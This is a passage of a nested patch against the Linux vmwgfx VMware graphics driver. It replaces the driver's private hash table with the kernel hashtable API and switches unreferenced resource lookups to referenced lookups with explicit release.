+-	bo = ttm_bo_get_unless_zero(&vmw_bo->base);
+-	vmw_bo = vmw_buffer_object(bo);
+-	drm_gem_object_put(gobj);
+-
+-	return vmw_bo;
+-}
+-
+-
+ /**
+  * vmw_bo_fence_single - Utility function to fence a single TTM buffer
+  *                       object without unreserving it.
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_cmdbuf_res.c b/drivers/gpu/drm/vmwgfx/vmwgfx_cmdbuf_res.c
+index 82ef58ccdd428..47bc0b411055f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_cmdbuf_res.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_cmdbuf_res.c
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0 OR MIT
+ /**************************************************************************
+  *
+- * Copyright 2014-2015 VMware, Inc., Palo Alto, CA., USA
++ * Copyright 2014-2022 VMware, Inc., Palo Alto, CA., USA
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+  * copy of this software and associated documentation files (the
+@@ -28,6 +28,8 @@
+ #include "vmwgfx_drv.h"
+ #include "vmwgfx_resource_priv.h"
+ 
++#include <linux/hashtable.h>
++
+ #define VMW_CMDBUF_RES_MAN_HT_ORDER 12
+ 
+ /**
+@@ -59,7 +61,7 @@ struct vmw_cmdbuf_res {
+  * @resources and @list are protected by the cmdbuf mutex for now.
+  */
+ struct vmw_cmdbuf_res_manager {
+-	struct vmwgfx_open_hash resources;
++	DECLARE_HASHTABLE(resources, VMW_CMDBUF_RES_MAN_HT_ORDER);
+ 	struct list_head list;
+ 	struct vmw_private *dev_priv;
+ };
+@@ -82,14 +84,13 @@ vmw_cmdbuf_res_lookup(struct vmw_cmdbuf_res_manager *man,
+ 		      u32 user_key)
+ {
+ 	struct vmwgfx_hash_item *hash;
+-	int ret;
+ 	unsigned long key = user_key | (res_type << 24);
+ 
+-	ret = vmwgfx_ht_find_item(&man->resources, key, &hash);
+-	if (unlikely(ret != 0))
+-		return ERR_PTR(ret);
+-
+-	return drm_hash_entry(hash, struct vmw_cmdbuf_res, hash)->res;
++	hash_for_each_possible_rcu(man->resources, hash, head, key) {
++		if (hash->key == key)
++			return hlist_entry(hash, struct vmw_cmdbuf_res, hash)->res;
++	}
++	return ERR_PTR(-EINVAL);
+ }
+ 
+ /**
+@@ -105,7 +106,7 @@ static void vmw_cmdbuf_res_free(struct vmw_cmdbuf_res_manager *man,
+ 				struct vmw_cmdbuf_res *entry)
+ {
+ 	list_del(&entry->head);
+-	WARN_ON(vmwgfx_ht_remove_item(&man->resources, &entry->hash));
++	hash_del_rcu(&entry->hash.head);
+ 	vmw_resource_unreference(&entry->res);
+ 	kfree(entry);
+ }
+@@ -159,7 +160,6 @@ void vmw_cmdbuf_res_commit(struct list_head *list)
+ void vmw_cmdbuf_res_revert(struct list_head *list)
+ {
+ 	struct vmw_cmdbuf_res *entry, *next;
+-	int ret;
+ 
+ 	list_for_each_entry_safe(entry, next, list, head) {
+ 		switch (entry->state) {
+@@ -167,8 +167,8 @@ void vmw_cmdbuf_res_revert(struct list_head *list)
+ 			vmw_cmdbuf_res_free(entry->man, entry);
+ 			break;
+ 		case VMW_CMDBUF_RES_DEL:
+-			ret = vmwgfx_ht_insert_item(&entry->man->resources, &entry->hash);
+-			BUG_ON(ret);
++			hash_add_rcu(entry->man->resources, &entry->hash.head,
++						entry->hash.key);
+ 			list_move_tail(&entry->head, &entry->man->list);
+ 			entry->state = VMW_CMDBUF_RES_COMMITTED;
+ 			break;
+@@ -199,26 +199,20 @@ int vmw_cmdbuf_res_add(struct vmw_cmdbuf_res_manager *man,
+ 		       struct list_head *list)
+ {
+ 	struct vmw_cmdbuf_res *cres;
+-	int ret;
+ 
+ 	cres = kzalloc(sizeof(*cres), GFP_KERNEL);
+ 	if (unlikely(!cres))
+ 		return -ENOMEM;
+ 
+ 	cres->hash.key = user_key | (res_type << 24);
+-	ret = vmwgfx_ht_insert_item(&man->resources, &cres->hash);
+-	if (unlikely(ret != 0)) {
+-		kfree(cres);
+-		goto out_invalid_key;
+-	}
++	hash_add_rcu(man->resources, &cres->hash.head, cres->hash.key);
+ 
+ 	cres->state = VMW_CMDBUF_RES_ADD;
+ 	cres->res = vmw_resource_reference(res);
+ 	cres->man = man;
+ 	list_add_tail(&cres->head, list);
+ 
+-out_invalid_key:
+-	return ret;
++	return 0;
+ }
+ 
+ /**
+@@ -243,24 +237,26 @@ int vmw_cmdbuf_res_remove(struct vmw_cmdbuf_res_manager *man,
+ 			  struct list_head *list,
+ 			  struct vmw_resource **res_p)
+ {
+-	struct vmw_cmdbuf_res *entry;
++	struct vmw_cmdbuf_res *entry = NULL;
+ 	struct vmwgfx_hash_item *hash;
+-	int ret;
++	unsigned long key = user_key | (res_type << 24);
+ 
+-	ret = vmwgfx_ht_find_item(&man->resources, user_key | (res_type << 24),
+-			       &hash);
+-	if (likely(ret != 0))
++	hash_for_each_possible_rcu(man->resources, hash, head, key) {
++		if (hash->key == key) {
++			entry = hlist_entry(hash, struct vmw_cmdbuf_res, hash);
++			break;
++		}
++	}
++	if (unlikely(!entry))
+ 		return -EINVAL;
+ 
+-	entry = drm_hash_entry(hash, struct vmw_cmdbuf_res, hash);
+-
+ 	switch (entry->state) {
+ 	case VMW_CMDBUF_RES_ADD:
+ 		vmw_cmdbuf_res_free(man, entry);
+ 		*res_p = NULL;
+ 		break;
+ 	case VMW_CMDBUF_RES_COMMITTED:
+-		(void) vmwgfx_ht_remove_item(&man->resources, &entry->hash);
++		hash_del_rcu(&entry->hash.head);
+ 		list_del(&entry->head);
+ 		entry->state = VMW_CMDBUF_RES_DEL;
+ 		list_add_tail(&entry->head, list);
+@@ -287,7 +283,6 @@ struct vmw_cmdbuf_res_manager *
+ vmw_cmdbuf_res_man_create(struct vmw_private *dev_priv)
+ {
+ 	struct vmw_cmdbuf_res_manager *man;
+-	int ret;
+ 
+ 	man = kzalloc(sizeof(*man), GFP_KERNEL);
+ 	if (!man)
+@@ -295,12 +290,8 @@ vmw_cmdbuf_res_man_create(struct vmw_private *dev_priv)
+ 
+ 	man->dev_priv = dev_priv;
+ 	INIT_LIST_HEAD(&man->list);
+-	ret = vmwgfx_ht_create(&man->resources, VMW_CMDBUF_RES_MAN_HT_ORDER);
+-	if (ret == 0)
+-		return man;
+-
+-	kfree(man);
+-	return ERR_PTR(ret);
++	hash_init(man->resources);
++	return man;
+ }
+ 
+ /**
+@@ -320,7 +311,6 @@ void vmw_cmdbuf_res_man_destroy(struct vmw_cmdbuf_res_manager *man)
+ 	list_for_each_entry_safe(entry, next, &man->list, head)
+ 		vmw_cmdbuf_res_free(man, entry);
+ 
+-	vmwgfx_ht_remove(&man->resources);
+ 	kfree(man);
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+index d7bd5eb1d3acd..b909a3ce9af3c 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+@@ -25,10 +25,13 @@
+  *
+  **************************************************************************/
+ 
+-#include <linux/dma-mapping.h>
+-#include <linux/module.h>
+-#include <linux/pci.h>
+-#include <linux/cc_platform.h>
++
++#include "vmwgfx_drv.h"
++
++#include "vmwgfx_devcaps.h"
++#include "vmwgfx_mksstat.h"
++#include "vmwgfx_binding.h"
++#include "ttm_object.h"
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_drv.h>
+@@ -41,11 +44,11 @@
+ #include <drm/ttm/ttm_placement.h>
+ #include <generated/utsrelease.h>
+ 
+-#include "ttm_object.h"
+-#include "vmwgfx_binding.h"
+-#include "vmwgfx_devcaps.h"
+-#include "vmwgfx_drv.h"
+-#include "vmwgfx_mksstat.h"
++#include <linux/cc_platform.h>
++#include <linux/dma-mapping.h>
++#include <linux/module.h>
++#include <linux/pci.h>
++#include <linux/version.h>
+ 
+ #define VMWGFX_DRIVER_DESC "Linux drm driver for VMware graphics devices"
+ 
+@@ -806,6 +809,43 @@ static int vmw_detect_version(struct vmw_private *dev)
+ 	return 0;
+ }
+ 
++static void vmw_write_driver_id(struct vmw_private *dev)
++{
++	if ((dev->capabilities2 & SVGA_CAP2_DX2) != 0) {
++		vmw_write(dev,  SVGA_REG_GUEST_DRIVER_ID,
++			  SVGA_REG_GUEST_DRIVER_ID_LINUX);
++
++		vmw_write(dev, SVGA_REG_GUEST_DRIVER_VERSION1,
++			  LINUX_VERSION_MAJOR << 24 |
++			  LINUX_VERSION_PATCHLEVEL << 16 |
++			  LINUX_VERSION_SUBLEVEL);
++		vmw_write(dev, SVGA_REG_GUEST_DRIVER_VERSION2,
++			  VMWGFX_DRIVER_MAJOR << 24 |
++			  VMWGFX_DRIVER_MINOR << 16 |
++			  VMWGFX_DRIVER_PATCHLEVEL);
++		vmw_write(dev, SVGA_REG_GUEST_DRIVER_VERSION3, 0);
++
++		vmw_write(dev, SVGA_REG_GUEST_DRIVER_ID,
++			  SVGA_REG_GUEST_DRIVER_ID_SUBMIT);
++	}
++}
++
++static void vmw_sw_context_init(struct vmw_private *dev_priv)
++{
++	struct vmw_sw_context *sw_context = &dev_priv->ctx;
++
++	hash_init(sw_context->res_ht);
++}
++
++static void vmw_sw_context_fini(struct vmw_private *dev_priv)
++{
++	struct vmw_sw_context *sw_context = &dev_priv->ctx;
++
++	vfree(sw_context->cmd_bounce);
++	if (sw_context->staged_bindings)
++		vmw_binding_state_free(sw_context->staged_bindings);
++}
++
+ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ {
+ 	int ret;
+@@ -815,6 +855,8 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 
+ 	dev_priv->drm.dev_private = dev_priv;
+ 
++	vmw_sw_context_init(dev_priv);
++
+ 	mutex_init(&dev_priv->cmdbuf_mutex);
+ 	mutex_init(&dev_priv->binding_mutex);
+ 	spin_lock_init(&dev_priv->resource_lock);
+@@ -970,7 +1012,7 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 		goto out_err0;
+ 	}
+ 
+-	dev_priv->tdev = ttm_object_device_init(12, &vmw_prime_dmabuf_ops);
++	dev_priv->tdev = ttm_object_device_init(&vmw_prime_dmabuf_ops);
+ 
+ 	if (unlikely(dev_priv->tdev == NULL)) {
+ 		drm_err(&dev_priv->drm,
+@@ -1091,6 +1133,7 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 	vmw_host_printf("vmwgfx: Module Version: %d.%d.%d (kernel: %s)",
+ 			VMWGFX_DRIVER_MAJOR, VMWGFX_DRIVER_MINOR,
+ 			VMWGFX_DRIVER_PATCHLEVEL, UTS_RELEASE);
++	vmw_write_driver_id(dev_priv);
+ 
+ 	if (dev_priv->enable_fb) {
+ 		vmw_fifo_resource_inc(dev_priv);
+@@ -1143,9 +1186,7 @@ static void vmw_driver_unload(struct drm_device *dev)
+ 
+ 	unregister_pm_notifier(&dev_priv->pm_nb);
+ 
+-	if (dev_priv->ctx.res_ht_initialized)
+-		vmwgfx_ht_remove(&dev_priv->ctx.res_ht);
+-	vfree(dev_priv->ctx.cmd_bounce);
++	vmw_sw_context_fini(dev_priv);
+ 	if (dev_priv->enable_fb) {
+ 		vmw_fb_off(dev_priv);
+ 		vmw_fb_close(dev_priv);
+@@ -1173,8 +1214,6 @@ static void vmw_driver_unload(struct drm_device *dev)
+ 		vmw_irq_uninstall(&dev_priv->drm);
+ 
+ 	ttm_object_device_release(&dev_priv->tdev);
+-	if (dev_priv->ctx.staged_bindings)
+-		vmw_binding_state_free(dev_priv->ctx.staged_bindings);
+ 
+ 	for (i = vmw_res_context; i < vmw_res_max; ++i)
+ 		idr_destroy(&dev_priv->res_idr[i]);
+@@ -1203,7 +1242,7 @@ static int vmw_driver_open(struct drm_device *dev, struct drm_file *file_priv)
+ 	if (unlikely(!vmw_fp))
+ 		return ret;
+ 
+-	vmw_fp->tfile = ttm_object_file_init(dev_priv->tdev, 10);
++	vmw_fp->tfile = ttm_object_file_init(dev_priv->tdev);
+ 	if (unlikely(vmw_fp->tfile == NULL))
+ 		goto out_no_tfile;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 09e2d738aa876..0bc1ebc43002b 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -30,6 +30,7 @@
+ 
+ #include <linux/suspend.h>
+ #include <linux/sync_file.h>
++#include <linux/hashtable.h>
+ 
+ #include <drm/drm_auth.h>
+ #include <drm/drm_device.h>
+@@ -42,7 +43,6 @@
+ #include "ttm_object.h"
+ 
+ #include "vmwgfx_fence.h"
+-#include "vmwgfx_hashtab.h"
+ #include "vmwgfx_reg.h"
+ #include "vmwgfx_validation.h"
+ 
+@@ -93,6 +93,7 @@
+ #define VMW_RES_STREAM ttm_driver_type2
+ #define VMW_RES_FENCE ttm_driver_type3
+ #define VMW_RES_SHADER ttm_driver_type4
++#define VMW_RES_HT_ORDER 12
+ 
+ #define MKSSTAT_CAPACITY_LOG2 5U
+ #define MKSSTAT_CAPACITY (1U << MKSSTAT_CAPACITY_LOG2)
+@@ -102,6 +103,11 @@ struct vmw_fpriv {
+ 	bool gb_aware; /* user-space is guest-backed aware */
+ };
+ 
++struct vmwgfx_hash_item {
++	struct hlist_node head;
++	unsigned long key;
++};
++
+ /**
+  * struct vmw_buffer_object - TTM buffer object with vmwgfx additions
+  * @base: The TTM buffer object
+@@ -425,8 +431,7 @@ struct vmw_ctx_validation_info;
+  * @ctx: The validation context
+  */
+ struct vmw_sw_context{
+-	struct vmwgfx_open_hash res_ht;
+-	bool res_ht_initialized;
++	DECLARE_HASHTABLE(res_ht, VMW_RES_HT_ORDER);
+ 	bool kernel;
+ 	struct vmw_fpriv *fp;
+ 	struct drm_file *filp;
+@@ -821,12 +826,7 @@ extern int vmw_user_resource_lookup_handle(
+ 	uint32_t handle,
+ 	const struct vmw_user_resource_conv *converter,
+ 	struct vmw_resource **p_res);
+-extern struct vmw_resource *
+-vmw_user_resource_noref_lookup_handle(struct vmw_private *dev_priv,
+-				      struct ttm_object_file *tfile,
+-				      uint32_t handle,
+-				      const struct vmw_user_resource_conv *
+-				      converter);
++
+ extern int vmw_stream_claim_ioctl(struct drm_device *dev, void *data,
+ 				  struct drm_file *file_priv);
+ extern int vmw_stream_unref_ioctl(struct drm_device *dev, void *data,
+@@ -865,15 +865,6 @@ static inline bool vmw_resource_mob_attached(const struct vmw_resource *res)
+ 	return !RB_EMPTY_NODE(&res->mob_node);
+ }
+ 
+-/**
+- * vmw_user_resource_noref_release - release a user resource pointer looked up
+- * without reference
+- */
+-static inline void vmw_user_resource_noref_release(void)
+-{
+-	ttm_base_object_noref_release();
+-}
+-
+ /**
+  * Buffer object helper functions - vmwgfx_bo.c
+  */
+@@ -925,8 +916,6 @@ extern void vmw_bo_unmap(struct vmw_buffer_object *vbo);
+ extern void vmw_bo_move_notify(struct ttm_buffer_object *bo,
+ 			       struct ttm_resource *mem);
+ extern void vmw_bo_swap_notify(struct ttm_buffer_object *bo);
+-extern struct vmw_buffer_object *
+-vmw_user_bo_noref_lookup(struct drm_file *filp, u32 handle);
+ 
+ /**
+  * vmw_bo_adjust_prio - Adjust the buffer object eviction priority
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index f085dbd4736d5..70cfed4fdba04 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0 OR MIT
+ /**************************************************************************
+  *
+- * Copyright 2009 - 2015 VMware, Inc., Palo Alto, CA., USA
++ * Copyright 2009 - 2022 VMware, Inc., Palo Alto, CA., USA
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+  * copy of this software and associated documentation files (the
+@@ -25,6 +25,7 @@
+  *
+  **************************************************************************/
+ #include <linux/sync_file.h>
++#include <linux/hashtable.h>
+ 
+ #include "vmwgfx_drv.h"
+ #include "vmwgfx_reg.h"
+@@ -34,7 +35,6 @@
+ #include "vmwgfx_binding.h"
+ #include "vmwgfx_mksstat.h"
+ 
+-#define VMW_RES_HT_ORDER 12
+ 
+ /*
+  * Helper macro to get dx_ctx_node if available otherwise print an error
+@@ -290,20 +290,26 @@ static void vmw_execbuf_rcache_update(struct vmw_res_cache_entry *rcache,
+ 	rcache->valid_handle = 0;
+ }
+ 
++enum vmw_val_add_flags {
++	vmw_val_add_flag_none  =      0,
++	vmw_val_add_flag_noctx = 1 << 0,
++};
++
+ /**
+- * vmw_execbuf_res_noref_val_add - Add a resource described by an unreferenced
+- * rcu-protected pointer to the validation list.
++ * vmw_execbuf_res_val_add - Add a resource to the validation list.
+  *
+  * @sw_context: Pointer to the software context.
+  * @res: Unreferenced rcu-protected pointer to the resource.
+  * @dirty: Whether to change dirty status.
++ * @flags: specifies whether to use the context or not
+  *
+  * Returns: 0 on success. Negative error code on failure. Typical error codes
+  * are %-EINVAL on inconsistency and %-ESRCH if the resource was doomed.
+  */
+-static int vmw_execbuf_res_noref_val_add(struct vmw_sw_context *sw_context,
+-					 struct vmw_resource *res,
+-					 u32 dirty)
++static int vmw_execbuf_res_val_add(struct vmw_sw_context *sw_context,
++				   struct vmw_resource *res,
++				   u32 dirty,
++				   u32 flags)
+ {
+ 	struct vmw_private *dev_priv = res->dev_priv;
+ 	int ret;
+@@ -318,24 +324,30 @@ static int vmw_execbuf_res_noref_val_add(struct vmw_sw_context *sw_context,
+ 		if (dirty)
+ 			vmw_validation_res_set_dirty(sw_context->ctx,
+ 						     rcache->private, dirty);
+-		vmw_user_resource_noref_release();
+ 		return 0;
+ 	}
+ 
+-	priv_size = vmw_execbuf_res_size(dev_priv, res_type);
+-	ret = vmw_validation_add_resource(sw_context->ctx, res, priv_size,
+-					  dirty, (void **)&ctx_info,
+-					  &first_usage);
+-	vmw_user_resource_noref_release();
+-	if (ret)
+-		return ret;
++	if ((flags & vmw_val_add_flag_noctx) != 0) {
++		ret = vmw_validation_add_resource(sw_context->ctx, res, 0, dirty,
++						  (void **)&ctx_info, NULL);
++		if (ret)
++			return ret;
+ 
+-	if (priv_size && first_usage) {
+-		ret = vmw_cmd_ctx_first_setup(dev_priv, sw_context, res,
+-					      ctx_info);
+-		if (ret) {
+-			VMW_DEBUG_USER("Failed first usage context setup.\n");
++	} else {
++		priv_size = vmw_execbuf_res_size(dev_priv, res_type);
++		ret = vmw_validation_add_resource(sw_context->ctx, res, priv_size,
++						  dirty, (void **)&ctx_info,
++						  &first_usage);
++		if (ret)
+ 			return ret;
++
++		if (priv_size && first_usage) {
++			ret = vmw_cmd_ctx_first_setup(dev_priv, sw_context, res,
++						      ctx_info);
++			if (ret) {
++				VMW_DEBUG_USER("Failed first usage context setup.\n");
++				return ret;
++			}
+ 		}
+ 	}
+ 
+@@ -343,43 +355,6 @@ static int vmw_execbuf_res_noref_val_add(struct vmw_sw_context *sw_context,
+ 	return 0;
+ }
+ 
+-/**
+- * vmw_execbuf_res_noctx_val_add - Add a non-context resource to the resource
+- * validation list if it's not already on it
+- *
+- * @sw_context: Pointer to the software context.
+- * @res: Pointer to the resource.
+- * @dirty: Whether to change dirty status.
+- *
+- * Returns: Zero on success. Negative error code on failure.
+- */
+-static int vmw_execbuf_res_noctx_val_add(struct vmw_sw_context *sw_context,
+-					 struct vmw_resource *res,
+-					 u32 dirty)
+-{
+-	struct vmw_res_cache_entry *rcache;
+-	enum vmw_res_type res_type = vmw_res_type(res);
+-	void *ptr;
+-	int ret;
+-
+-	rcache = &sw_context->res_cache[res_type];
+-	if (likely(rcache->valid && rcache->res == res)) {
+-		if (dirty)
+-			vmw_validation_res_set_dirty(sw_context->ctx,
+-						     rcache->private, dirty);
+-		return 0;
+-	}
+-
+-	ret = vmw_validation_add_resource(sw_context->ctx, res, 0, dirty,
+-					  &ptr, NULL);
+-	if (ret)
+-		return ret;
+-
+-	vmw_execbuf_rcache_update(rcache, res, ptr);
+-
+-	return 0;
+-}
+-
+ /**
+  * vmw_view_res_val_add - Add a view and the surface it's pointing to to the
+  * validation list
+@@ -398,13 +373,13 @@ static int vmw_view_res_val_add(struct vmw_sw_context *sw_context,
+ 	 * First add the resource the view is pointing to, otherwise it may be
+ 	 * swapped out when the view is validated.
+ 	 */
+-	ret = vmw_execbuf_res_noctx_val_add(sw_context, vmw_view_srf(view),
+-					    vmw_view_dirtying(view));
++	ret = vmw_execbuf_res_val_add(sw_context, vmw_view_srf(view),
++				      vmw_view_dirtying(view), vmw_val_add_flag_noctx);
+ 	if (ret)
+ 		return ret;
+ 
+-	return vmw_execbuf_res_noctx_val_add(sw_context, view,
+-					     VMW_RES_DIRTY_NONE);
++	return vmw_execbuf_res_val_add(sw_context, view, VMW_RES_DIRTY_NONE,
++				       vmw_val_add_flag_noctx);
+ }
+ 
+ /**
+@@ -475,8 +450,9 @@ static int vmw_resource_context_res_add(struct vmw_private *dev_priv,
+ 			if (IS_ERR(res))
+ 				continue;
+ 
+-			ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-							    VMW_RES_DIRTY_SET);
++			ret = vmw_execbuf_res_val_add(sw_context, res,
++						      VMW_RES_DIRTY_SET,
++						      vmw_val_add_flag_noctx);
+ 			if (unlikely(ret != 0))
+ 				return ret;
+ 		}
+@@ -490,9 +466,9 @@ static int vmw_resource_context_res_add(struct vmw_private *dev_priv,
+ 		if (vmw_res_type(entry->res) == vmw_res_view)
+ 			ret = vmw_view_res_val_add(sw_context, entry->res);
+ 		else
+-			ret = vmw_execbuf_res_noctx_val_add
+-				(sw_context, entry->res,
+-				 vmw_binding_dirtying(entry->bt));
++			ret = vmw_execbuf_res_val_add(sw_context, entry->res,
++						      vmw_binding_dirtying(entry->bt),
++						      vmw_val_add_flag_noctx);
+ 		if (unlikely(ret != 0))
+ 			break;
+ 	}
+@@ -658,7 +634,8 @@ vmw_cmd_res_check(struct vmw_private *dev_priv,
+ {
+ 	struct vmw_res_cache_entry *rcache = &sw_context->res_cache[res_type];
+ 	struct vmw_resource *res;
+-	int ret;
++	int ret = 0;
++	bool needs_unref = false;
+ 
+ 	if (p_res)
+ 		*p_res = NULL;
+@@ -683,17 +660,18 @@ vmw_cmd_res_check(struct vmw_private *dev_priv,
+ 		if (ret)
+ 			return ret;
+ 
+-		res = vmw_user_resource_noref_lookup_handle
+-			(dev_priv, sw_context->fp->tfile, *id_loc, converter);
+-		if (IS_ERR(res)) {
++		ret = vmw_user_resource_lookup_handle
++			(dev_priv, sw_context->fp->tfile, *id_loc, converter, &res);
++		if (ret != 0) {
+ 			VMW_DEBUG_USER("Could not find/use resource 0x%08x.\n",
+ 				       (unsigned int) *id_loc);
+-			return PTR_ERR(res);
++			return ret;
+ 		}
++		needs_unref = true;
+ 
+-		ret = vmw_execbuf_res_noref_val_add(sw_context, res, dirty);
++		ret = vmw_execbuf_res_val_add(sw_context, res, dirty, vmw_val_add_flag_none);
+ 		if (unlikely(ret != 0))
+-			return ret;
++			goto res_check_done;
+ 
+ 		if (rcache->valid && rcache->res == res) {
+ 			rcache->valid_handle = true;
+@@ -708,7 +686,11 @@ vmw_cmd_res_check(struct vmw_private *dev_priv,
+ 	if (p_res)
+ 		*p_res = res;
+ 
+-	return 0;
++res_check_done:
++	if (needs_unref)
++		vmw_resource_unreference(&res);
++
++	return ret;
+ }
+ 
+ /**
+@@ -1171,9 +1153,9 @@ static int vmw_translate_mob_ptr(struct vmw_private *dev_priv,
+ 	int ret;
+ 
+ 	vmw_validation_preload_bo(sw_context->ctx);
+-	vmw_bo = vmw_user_bo_noref_lookup(sw_context->filp, handle);
+-	if (IS_ERR(vmw_bo)) {
+-		VMW_DEBUG_USER("Could not find or use MOB buffer.\n");
++	ret = vmw_user_bo_lookup(sw_context->filp, handle, &vmw_bo);
++	if (ret != 0) {
++		drm_dbg(&dev_priv->drm, "Could not find or use MOB buffer.\n");
+ 		return PTR_ERR(vmw_bo);
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, true, false);
+@@ -1225,9 +1207,9 @@ static int vmw_translate_guest_ptr(struct vmw_private *dev_priv,
+ 	int ret;
+ 
+ 	vmw_validation_preload_bo(sw_context->ctx);
+-	vmw_bo = vmw_user_bo_noref_lookup(sw_context->filp, handle);
+-	if (IS_ERR(vmw_bo)) {
+-		VMW_DEBUG_USER("Could not find or use GMR region.\n");
++	ret = vmw_user_bo_lookup(sw_context->filp, handle, &vmw_bo);
++	if (ret != 0) {
++		drm_dbg(&dev_priv->drm, "Could not find or use GMR region.\n");
+ 		return PTR_ERR(vmw_bo);
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, false, false);
+@@ -2025,8 +2007,9 @@ static int vmw_cmd_set_shader(struct vmw_private *dev_priv,
+ 		res = vmw_shader_lookup(vmw_context_res_man(ctx),
+ 					cmd->body.shid, cmd->body.type);
+ 		if (!IS_ERR(res)) {
+-			ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-							    VMW_RES_DIRTY_NONE);
++			ret = vmw_execbuf_res_val_add(sw_context, res,
++						      VMW_RES_DIRTY_NONE,
++						      vmw_val_add_flag_noctx);
+ 			if (unlikely(ret != 0))
+ 				return ret;
+ 
+@@ -2273,8 +2256,9 @@ static int vmw_cmd_dx_set_shader(struct vmw_private *dev_priv,
+ 			return PTR_ERR(res);
+ 		}
+ 
+-		ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-						    VMW_RES_DIRTY_NONE);
++		ret = vmw_execbuf_res_val_add(sw_context, res,
++					      VMW_RES_DIRTY_NONE,
++					      vmw_val_add_flag_noctx);
+ 		if (ret)
+ 			return ret;
+ 	}
+@@ -2777,8 +2761,8 @@ static int vmw_cmd_dx_bind_shader(struct vmw_private *dev_priv,
+ 		return PTR_ERR(res);
+ 	}
+ 
+-	ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-					    VMW_RES_DIRTY_NONE);
++	ret = vmw_execbuf_res_val_add(sw_context, res, VMW_RES_DIRTY_NONE,
++				      vmw_val_add_flag_noctx);
+ 	if (ret) {
+ 		VMW_DEBUG_USER("Error creating resource validation node.\n");
+ 		return ret;
+@@ -3098,8 +3082,8 @@ static int vmw_cmd_dx_bind_streamoutput(struct vmw_private *dev_priv,
+ 
+ 	vmw_dx_streamoutput_set_size(res, cmd->body.sizeInBytes);
+ 
+-	ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-					    VMW_RES_DIRTY_NONE);
++	ret = vmw_execbuf_res_val_add(sw_context, res, VMW_RES_DIRTY_NONE,
++				      vmw_val_add_flag_noctx);
+ 	if (ret) {
+ 		DRM_ERROR("Error creating resource validation node.\n");
+ 		return ret;
+@@ -3148,8 +3132,8 @@ static int vmw_cmd_dx_set_streamoutput(struct vmw_private *dev_priv,
+ 		return 0;
+ 	}
+ 
+-	ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-					    VMW_RES_DIRTY_NONE);
++	ret = vmw_execbuf_res_val_add(sw_context, res, VMW_RES_DIRTY_NONE,
++				      vmw_val_add_flag_noctx);
+ 	if (ret) {
+ 		DRM_ERROR("Error creating resource validation node.\n");
+ 		return ret;
+@@ -4067,22 +4051,26 @@ static int vmw_execbuf_tie_context(struct vmw_private *dev_priv,
+ 	if (ret)
+ 		return ret;
+ 
+-	res = vmw_user_resource_noref_lookup_handle
++	ret = vmw_user_resource_lookup_handle
+ 		(dev_priv, sw_context->fp->tfile, handle,
+-		 user_context_converter);
+-	if (IS_ERR(res)) {
++		 user_context_converter, &res);
++	if (ret != 0) {
+ 		VMW_DEBUG_USER("Could not find or user DX context 0x%08x.\n",
+ 			       (unsigned int) handle);
+-		return PTR_ERR(res);
++		return ret;
+ 	}
+ 
+-	ret = vmw_execbuf_res_noref_val_add(sw_context, res, VMW_RES_DIRTY_SET);
+-	if (unlikely(ret != 0))
++	ret = vmw_execbuf_res_val_add(sw_context, res, VMW_RES_DIRTY_SET,
++				      vmw_val_add_flag_none);
++	if (unlikely(ret != 0)) {
++		vmw_resource_unreference(&res);
+ 		return ret;
++	}
+ 
+ 	sw_context->dx_ctx_node = vmw_execbuf_info_from_res(sw_context, res);
+ 	sw_context->man = vmw_context_res_man(res);
+ 
++	vmw_resource_unreference(&res);
+ 	return 0;
+ }
+ 
+@@ -4101,7 +4089,7 @@ int vmw_execbuf_process(struct drm_file *file_priv,
+ 	int ret;
+ 	int32_t out_fence_fd = -1;
+ 	struct sync_file *sync_file = NULL;
+-	DECLARE_VAL_CONTEXT(val_ctx, &sw_context->res_ht, 1);
++	DECLARE_VAL_CONTEXT(val_ctx, sw_context, 1);
+ 
+ 	if (flags & DRM_VMW_EXECBUF_FLAG_EXPORT_FENCE_FD) {
+ 		out_fence_fd = get_unused_fd_flags(O_CLOEXEC);
+@@ -4164,14 +4152,6 @@ int vmw_execbuf_process(struct drm_file *file_priv,
+ 	if (sw_context->staged_bindings)
+ 		vmw_binding_state_reset(sw_context->staged_bindings);
+ 
+-	if (!sw_context->res_ht_initialized) {
+-		ret = vmwgfx_ht_create(&sw_context->res_ht, VMW_RES_HT_ORDER);
+-		if (unlikely(ret != 0))
+-			goto out_unlock;
+-
+-		sw_context->res_ht_initialized = true;
+-	}
+-
+ 	INIT_LIST_HEAD(&sw_context->staged_cmd_res);
